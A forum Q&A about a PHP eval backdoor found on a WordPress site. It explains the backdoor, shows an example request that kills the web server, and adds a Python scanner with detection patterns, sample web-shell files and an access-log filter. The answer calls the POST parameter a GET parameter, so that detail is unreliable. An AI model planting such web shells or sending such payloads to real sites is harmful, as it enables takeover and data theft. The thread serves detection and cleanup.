Found <?php @eval($_POST['pass']

Posted 2019-07-05 18:05

I found this code in one of my WordPress plugin sites. I guess it can be used with malicious intent, but what exactly does it do, and can I find out if it calls some other actions that I should be aware of?

2 answers
小情绪 Triste *
#2 · 2019-07-05 18:11

Yes, it is very bad. I can't imagine any situation where this code could exist as part of harmless software.

This code essentially allows running any PHP code given by the pass GET parameter. For example, calling this PHP as http://yoursite/your.php?pass=system("killall -9 apache"); will shut down your webserver. But it is usable for anything (including overwriting or extending your existing scripts to save the site passwords in a temporary file, and later retrieving that temporary file).

It is probably a backdoor, and probably not the only one. Your site needs a deep security check.
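To the asker's second question (whether the file reveals what else it calls): it cannot, because with `eval($_POST['pass'])` the executed code lives in each request body, not in the file. What a site owner can do is find every file carrying this pattern and then check the access log for who requested those files. The following is an added example, not code from the original post or from WordPress: a small static scanner for PHP that hands request input to `eval()` or a shell function, plus a combined-log filter that lists requests to the flagged files. All file contents and log lines in it are constructed samples; the paths and IP addresses are placeholders.

```python
"""Added example (not from the original post): flag PHP that evaluates request input,
then list access-log requests to the flagged files. All samples below are constructed."""
from __future__ import annotations
import re
from dataclasses import dataclass

# Superglobals through which request data reaches PHP code.
REQUEST_SOURCES = r"\$_(?:POST|GET|REQUEST|COOKIE|SERVER|FILES)"

# (rule name, regex, explanation). The leading '@?' also catches the
# error-suppressed '@eval' form shown in the question.
RULES = [
    ("eval-of-request-input",
     re.compile(r"@?\beval\s*\(\s*" + REQUEST_SOURCES + r"\s*\["),
     "eval() runs whatever text the request carries; the code is not in the file"),
    ("eval-of-decoded-input",
     re.compile(r"@?\beval\s*\(\s*(?:base64_decode|gzinflate|str_rot13|gzuncompress)\s*\("),
     "eval() of a decoded payload, a common obfuscation layer"),
    ("command-from-request-input",
     re.compile(r"\b(?:system|exec|shell_exec|passthru|popen|proc_open)\s*\(\s*" + REQUEST_SOURCES),
     "shell command built directly from request input"),
]

@dataclass
class Finding:
    path: str
    rule: str
    line: int
    snippet: str
    note: str

def scan_php_source(path: str, source: str) -> list[Finding]:
    """Return one Finding per (line, rule) match in a PHP source string."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for name, pattern, note in RULES:
            if pattern.search(line):
                findings.append(Finding(path, name, lineno, line.strip(), note))
    return findings

def scan_files(files: dict[str, str]) -> list[Finding]:
    """Scan a {relative_path: source} mapping, e.g. built by walking wp-content/."""
    return [f for path, src in files.items() for f in scan_php_source(path, src)]

# Apache/nginx combined-log prefix: client, timestamp, request line, status.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

def requests_to_flagged_files(log_lines, flagged_paths):
    """List (ip, timestamp, method, path) for requests that hit a flagged file.
    The access log records the request line, not the POST body, so it shows
    who used the file and when, not which code they ran."""
    wanted = {"/" + p.lstrip("/") for p in flagged_paths}
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if m and m.group("path").split("?", 1)[0] in wanted:
            hits.append((m.group("ip"), m.group("ts"), m.group("method"), m.group("path")))
    return hits

# Constructed sample files; the first mirrors the snippet from the question.
SAMPLE_FILES = {
    "wp-content/plugins/example/helper.php":
        "<?php\nfunction example_helper() { return 1; }\n?>\n<?php @eval($_POST['pass']); ?>\n",
    "wp-content/uploads/cache.php":
        "<?php eval(base64_decode($_REQUEST['d'])); ?>\n",
    "wp-content/plugins/example/clean.php":
        "<?php\n$name = sanitize_text_field($_POST['name'] ?? '');\necho esc_html($name);\n",
}

# Constructed access-log lines (203.0.113.0/24 and 198.51.100.0/24 are documentation ranges).
SAMPLE_LOG = [
    '203.0.113.5 - - [05/Jul/2019:17:58:10 +0000] "GET /index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [05/Jul/2019:17:58:31 +0000] "POST /wp-content/plugins/example/helper.php HTTP/1.1" 200 14 "-" "python-requests/2.22"',
    '198.51.100.9 - - [05/Jul/2019:18:02:07 +0000] "POST /wp-content/uploads/cache.php HTTP/1.1" 200 0 "-" "curl/7.58"',
]

if __name__ == "__main__":
    found = scan_files(SAMPLE_FILES)
    for f in found:
        print(f"{f.path}:{f.line} [{f.rule}] {f.snippet}  # {f.note}")
    for hit in requests_to_flagged_files(SAMPLE_LOG, {f.path for f in found}):
        print("request to flagged file:", *hit)
```

On the sample input the scanner flags `helper.php` (line 4, the question's `@eval($_POST['pass'])`) and `cache.php` (a base64-wrapped variant) while leaving the sanitized `clean.php` alone, and the log filter returns the two POST requests to those files. The rules are deliberately narrow string patterns: they will miss shells that build the call name dynamically, so treat a clean result as "nothing obvious", and compare the files against a pristine copy of the plugin rather than trusting the scan alone.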
